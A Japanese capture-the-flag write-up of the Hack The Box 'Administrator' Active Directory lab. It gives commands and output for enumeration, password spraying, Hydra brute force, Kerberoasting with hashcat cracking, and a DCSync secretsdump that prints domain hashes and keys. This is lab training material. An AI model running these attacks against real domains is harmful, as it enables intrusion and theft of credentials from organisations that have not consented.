初めに
本記事は Hack The Box(以下リンク参照) の「Administrator」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
ポートスキャン
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.42 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.42:21
Open 10.10.11.42:53
Open 10.10.11.42:88
Open 10.10.11.42:135
Open 10.10.11.42:139
Open 10.10.11.42:389
Open 10.10.11.42:445
Open 10.10.11.42:464
Open 10.10.11.42:593
Open 10.10.11.42:3268
Open 10.10.11.42:3269
Open 10.10.11.42:5985
Open 10.10.11.42:9389
Open 10.10.11.42:47001
Open 10.10.11.42:49665
Open 10.10.11.42:49664
Open 10.10.11.42:49666
Open 10.10.11.42:49667
Open 10.10.11.42:49669
Open 10.10.11.42:53502
Open 10.10.11.42:53507
Open 10.10.11.42:53526
Open 10.10.11.42:53529
Open 10.10.11.42:53561
Open 10.10.11.42:56624
Open 10.10.11.42:64270
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 05:54 EST
Initiating Ping Scan at 05:54
Scanning 10.10.11.42 [4 ports]
Completed Ping Scan at 05:54, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:54
Completed Parallel DNS resolution of 1 host. at 05:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:54
Scanning 10.10.11.42 [26 ports]
Discovered open port 445/tcp on 10.10.11.42
Discovered open port 139/tcp on 10.10.11.42
Discovered open port 21/tcp on 10.10.11.42
Discovered open port 135/tcp on 10.10.11.42
Discovered open port 3269/tcp on 10.10.11.42
Discovered open port 593/tcp on 10.10.11.42
Discovered open port 64270/tcp on 10.10.11.42
Discovered open port 53/tcp on 10.10.11.42
Discovered open port 53561/tcp on 10.10.11.42
Discovered open port 88/tcp on 10.10.11.42
Discovered open port 49666/tcp on 10.10.11.42
Discovered open port 3268/tcp on 10.10.11.42
Discovered open port 53526/tcp on 10.10.11.42
Discovered open port 9389/tcp on 10.10.11.42
Discovered open port 56624/tcp on 10.10.11.42
Discovered open port 49665/tcp on 10.10.11.42
Discovered open port 389/tcp on 10.10.11.42
Discovered open port 49664/tcp on 10.10.11.42
Discovered open port 47001/tcp on 10.10.11.42
Discovered open port 464/tcp on 10.10.11.42
Discovered open port 53507/tcp on 10.10.11.42
Discovered open port 49667/tcp on 10.10.11.42
Discovered open port 49669/tcp on 10.10.11.42
Discovered open port 5985/tcp on 10.10.11.42
Discovered open port 53529/tcp on 10.10.11.42
Discovered open port 53502/tcp on 10.10.11.42
Completed SYN Stealth Scan at 05:54, 0.41s elapsed (26 total ports)
Nmap scan report for 10.10.11.42
Host is up, received echo-reply ttl 127 (0.19s latency).
Scanned at 2024-11-16 05:54:39 EST for 0s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
53502/tcp open unknown syn-ack ttl 127
53507/tcp open unknown syn-ack ttl 127
53526/tcp open unknown syn-ack ttl 127
53529/tcp open unknown syn-ack ttl 127
53561/tcp open unknown syn-ack ttl 127
56624/tcp open unknown syn-ack ttl 127
64270/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
Raw packets sent: 30 (1.296KB) | Rcvd: 27 (1.172KB)
WindowsのPortが開いている。HTTP系のブラウザを扱うサービスはなさそう。AD環境ぽい。
ドメイン情報収集
ldapのスクリプトも回してさっとAD環境の情報を取得する。
┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn --script ldap-rootdse 10.10.11.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 05:56 EST
Nmap scan report for 10.10.11.42
Host is up (0.19s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=administrator,DC=htb
| ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=administrator,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=administrator,DC=htb
| namingContexts: CN=Configuration,DC=administrator,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=DomainDnsZones,DC=administrator,DC=htb
| namingContexts: DC=ForestDnsZones,DC=administrator,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 134885
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| dnsHostName: dc.administrator.htb
| defaultNamingContext: DC=administrator,DC=htb
| currentTime: 20241116175615.0Z
|_ configurationNamingContext: CN=Configuration,DC=administrator,DC=htb
Service Info: Host: DC; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
administrator.htbのドメイン情報を掴むことが出来た。この情報を/etc/hostsに以下のように登録しておく。
10.10.11.42 administrator.htb
enum4linuxも回しておく
┌──(root㉿kali)-[~]
└─# enum4linux 10.10.11.42
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Nov 16 05:58:43 2024
=========================================( Target Information )=========================================
Target ........... 10.10.11.42
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.42 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.11.42 )================================
Looking up status of 10.10.11.42
No reply from 10.10.11.42
====================================( Session Check on 10.10.11.42 )====================================
[+] Server 10.10.11.42 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.11.42 )=================================
Domain Name: ADMINISTRATOR
Domain Sid: S-1-5-21-1088858960-373806567-254189436
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.11.42 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.11.42 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
========================================( Users on 10.10.11.42 )========================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==================================( Share Enumeration on 10.10.11.42 )==================================
do_connect: Connection to 10.10.11.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.11.42
============================( Password Policy Information for 10.10.11.42 )============================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.11.42 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.11.42)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=======================================( Groups on 10.10.11.42 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 10.10.11.42 via RID cycling (RIDS: 500-550,1000-1050) )===================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
================================( Getting printer info for 10.10.11.42 )================================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Nov 16 05:59:36 2024
特段いい情報はない。
SMB enum
SMBを掘り下げておく。
┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.10.11.42
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
特段良さそうなものはない。
LDAP enum
ldapsearchも試しておく。
┌──(root㉿kali)-[~]
└─# ldapsearch -x -v -b "DC=administrator,DC=htb" -H "ldap://10.10.11.42" "(objectclass=*)"
ldap_initialize( ldap://10.10.11.42:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
# extended LDIF
#
# LDAPv3
# base <DC=administrator,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
特段いいものはない。
イニシャルアクセス
ユーザ列挙
Kerbrute
AD環境でユーザを列挙してみようとすると命名規則とか色々考慮すべきことはありますが
とりあえずブルフォしときます。最初に思いつくのはkerbruteですね。
┌──(root㉿kali)-[~]
└─# kerbrute userenum -d administrator.htb --dc 10.10.11.42 /usr/share/seclists/Usernames/Names/names.txt
幾つかアカウントを発見した。
ASREProast
ユーザアカウントが見つかったのでASREProastを実施する。
┌──(root㉿kali)-[~/work]
└─# impacket-GetNPUsers administrator.htb/ -no-pass -dc-ip 10.10.11.42 -usersfile userlist -format john -outputfile outhash.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User benjamin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User emily doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ethan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User michael doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User olivia doesn't have UF_DONT_REQUIRE_PREAUTH set
この方向ではなさそう。とりあえず総当たりでブルフォしてみるか。
BruteForce
Password spray
ユーザ名と同じパスワードかどうか試してみる。
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.10.11.42 -u userlist -p userlist --no-brute
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [-] administrator.htb\benjamin:benjamin STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\emily:emily STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\ethan:ethan STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\michael:michael STATUS_LOGON_FAILURE
SMB 10.10.11.42 445 DC [-] administrator.htb\olivia:olivia STATUS_LOGON_FAILUR
ダメっぽい。
Password Guess
cuppでパスワードを適当に生成してみる。
┌──(root㉿kali)-[~/work]
└─# cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: benjamin
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]: Y
> Do you want to add some random numbers at the end of words? Y/[N]:Y
> Leet mode? (i.e. leet = 1337) Y/[N]: y
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to benjamin.txt, counting 2528 words.
[+] Now load your pistolero with benjamin.txt and shoot! Good luck!
各ユーザで作れて試せる物量だったので試していたが、ヒットするものはなかった。
FTPのプロトコルで認証をHydraでかけてみても以下のように同じような結果だった。
┌──(root㉿kali)-[~/work]
└─# hydra -l benjamin -P benjamin.txt ftp://10.10.11.42
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-16 06:22:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2528 login tries (l:1/p:2528), ~158 tries per task
[DATA] attacking ftp://10.10.11.42:21/
[STATUS] 1533.00 tries/min, 1533 tries in 00:01h, 995 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-16 06:24:14
HTBの新たな傾向
ここで結構詰まってしまった。アカウント名を割り出せはしたのだが、ここからどうにかして侵入できないかでずっと右往左往していた。
ふとHTBのBOX起動ページを見ていると以下の表示があるのを発見した。
え、アカウントのクレデンシャル最初から渡されるの!?
え、じゃぁこれで再度列挙します。
え、こんなの今までHTBで見たことなかった。
情報収集
RID-Brute
とりあえず認証が通るかも兼ねて、RID-Bruteもついでに回します。
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.10.11.42 -u olivia -p ichliebedich --rid-brute
いけそう。ユーザもさっきより見つかった。
Bloodhound
クレデンシャル情報を使ってADの情報を列挙します。
いつものRusthoundさん頼みます。
┌──(root㉿kali)-[/opt/RustHound]
└─# ./rusthound_musl -d administrator.htb -i 10.10.11.42 -u olivia -p ichliebedich -z --adcs
---------------------------------------------------
Initializing RustHound at 06:47:23 on 11/16/24
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2024-11-16T11:47:23Z INFO rusthound] Verbosity level: Info
[2024-11-16T11:47:23Z INFO rusthound::ldap] Connected to ADMINISTRATOR.HTB Active Directory!
[2024-11-16T11:47:23Z INFO rusthound::ldap] Starting data collection...
[2024-11-16T11:47:25Z INFO rusthound::ldap] All data collected for NamingContext DC=administrator,DC=htb
[2024-11-16T11:47:25Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=administrator,DC=htb
[2024-11-16T11:47:25Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2024-11-16T11:47:25Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2024-11-16T11:47:25Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2024-11-16T11:47:25Z INFO rusthound::json::checker] Starting checker to replace some values...
[2024-11-16T11:47:25Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2024-11-16T11:47:25Z INFO rusthound::modules] Starting checker for ADCS values...
[2024-11-16T11:47:25Z INFO rusthound::modules] Checking for ADCS values finished!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 11 users parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 61 groups parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 1 computers parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 1 ous parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 1 domains parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 2 gpos parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 21 containers parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 0 cas parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] 0 templates parsed!
[2024-11-16T11:47:25Z INFO rusthound::json::maker] .//20241116064725_administrator-htb_rusthound.zip created!
RustHound Enumeration Completed at 06:47:25 on 11/16/24! Happy Graphing
情報いただきました。
横展開
kerberoasting
Bloodhoundさんを使ってkerberoastingできそうなユーザがいるか調べてみます。
以下のクエリを叩き込みます。
MATCH (u:User) WHERE u.hasspn=true RETURN u
ethanがいます。というわけでこいつのハッシュを解析したいと思います。
kerberoastingを実施します。うまくいかない場合はntpdateコマンドで時刻を調整します。
┌──(root㉿kali)-[~/work]
└─# ntpdate 10.10.11.42
2024-11-16 13:59:06.994371 (-0500) +25190.693461 +/- 0.097352 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25190.693461
┌──(root㉿kali)-[~/work]
└─# impacket-GetUserSPNs -dc-ip 10.10.11.42 administrator.htb/olivia:ichliebedich -request -outputfile tgs.hash -save
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ----- -------- -------------------------- -------------------------- ----------
foobar/xd ethan 2024-10-12 16:52:14.117811 2024-11-16 06:51:04.123695
hashcatで解析します。
┌──(root㉿kali)-[~/work]
└─# hashcat -m 13100 -a 0 tgs.hash /usr/share/wordlists/rockyou.txt -r /usr/share/john/rules/best64.rule --force
... 省略
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 286887700
* Runtime...: 1 sec
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$04faeac9ab1009f219a98e78562084e4$71392677fcfd5bd28a8a78fb40f498cfe82ee6bf6a51b1a7b88207cdcf7f2379c749e9d56a6253f5bc7a4951ef650025d16013e3593e12d0cfd9967d11ee371ce8a715a5d41d53324c42dd92eb2f9ea0db128266e259ee1b51d8ce0decc31bbeb41f4a71f2252e90787345fb9824c42b733f8594cc7b35977ef12e156e26666ab3d5dfe4077dc2a0f9791746bef782517562754083cbfab44c2b8e747a11b05d7b92ba79d0c947c1b8b5e9d6f965710d3abf617a847cc709caca525987a5aed1b77b34396e534d81ad7dac637a73e04cf62af959c322dc61831786738d5f3992d748b505160841a1a00a7b00523c191a672fa05a6b4cbeb6fdc0bd9f2cbe16f3c0ffedb00811adf83d3df63e761045fc4a915a03e6d87e381e7a494fe1c86784a5a855e870a47e10598202acb64381a7d83899424ee13f6cf5ad0e497031c00389769c83c89433fea0114d0811ef7836be24ad603b0a758092f2e02fed5d12f2e139da6ba041dd92a574d5c463ab2dfc25a9f1fa03a81a2a346d0c76f66cbd50e8280e85a91ea398ee30d194244ebf26b86cbae55b13faace2903674ec2bab6358f01c0e53c8350dcdf7f8e7c55d12543305105919bfc296b7a94c1ab24b8ee8882fcf9bd889cb3156aa1c1fa8d8dc1c81463882eb865c7ecc7bfe4cb577f3bb96be31d1a7a85a46e690e753d5af64475f0380308dfc21ec3bb0123bf058cb31c7361a07bd55e692642e2f79ac0c176097e797d8741b914043efbdb386b3c8e55dab5e1e60dde1e138a40d3da8b607db86fe6ce8147a6440a0573bd67124472fdd4e348d1be9b2ce2e06043e45f3014976d170183ce4176655878d14f36e9e4e9c518a1f8d4a019d0e5c71e27fb62809324a56c516345c0094295e6a61a3c97722d05aaa47a0431b48988d232086b1a9d70a8c8e3b195db39b70a27e725c5e6bf49175e89ef54632c820c7872355b9ac53d99f5987b791edd7086f23bdfaf5c5166ec94be8773c3b916975b65ee57dffcd3b62c4395289269214332706847b7a241550b289e78442062f7d1550f200583a69e05f1cb5b05806da9dda631b0bb46a665c9e5c5c94c78158519c4e48daab8753a2035f7eb333642c112ed65b5d6cc63dbb82165568fc35039ed1554ff14ad41189529558832a0fde8f42b2b1806bead61a93103767d30c26e3795abbaff656aa05afdeed674f050699fa40b3f4d76761ecd40612edef4ff3a5e4610e7e58c5f46a3d1ad372c0d1f01a8f822db1e5437347ce87db4734b3e60624a099c9b5012ca0fe3c68ce4ca44bc68e41c56b0578106e45ab3fcd01f5af5ff6a5299b5ca1057d152598859d770970050923ea443bb13b7be6124612573e20aa1ef68539ee250df45ec57cf78ef02449bbb76b37075ce92dd9fce3e30eaa4e075b09c61dbb9eb15f02102857fa3499426077b8c5b5ad257840fec7756876565e588aa7e0baeee5acea38b875b0aa11ea88c22b9f654c15d268f7832a6ef7d420487aadd76bc8c2b735148df7:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....148df7
Time.Started.....: Sat Nov 16 07:00:56 2024, (1 sec)
Time.Estimated...: Sat Nov 16 07:00:57 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/john/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1019.4 kH/s (14.40ms) @ Accel:256 Loops:20 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 122880/286887700 (0.04%)
Rejected.........: 0/122880 (0.00%)
Restore.Point....: 4608/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-20 Iteration:0-20
Candidate.Engine.: Device Generator
Candidates.#1....: Liverpool -> ityoui
Hardware.Mon.#1..: Util: 17%
無事解析出来たのでこのアカウントに成りすますことが出来ます。
権限昇格
DCSync
このethanでできることをBloodhoundで確認します。
DCSync出来そうなのでAdministratorのハッシュを抽出します。
┌──(root㉿kali)-[~/work]
└─# impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42 -just-dc
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:cc8147f790c91200a3e02c2ebc65f9fb:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:cc8147f790c91200a3e02c2ebc65f9fb:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:8c1a7cadc3ddd92674d13ff37bf0cf7773e4bdaf3378ea9e4e94fdb602760cc8
administrator.htb\michael:aes128-cts-hmac-sha1-96:1a9c007587233e81af172e15ce0ae62d
administrator.htb\michael:des-cbc-md5:c77f94f826e0b66e
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:55ade9738cec7b6737bb0e9a22538914f9ad86015243ab7e33b289a383118877
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:35102c04bf8ce28d3e6a0c131219bdee
administrator.htb\benjamin:des-cbc-md5:f1da51c2206b26ec
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
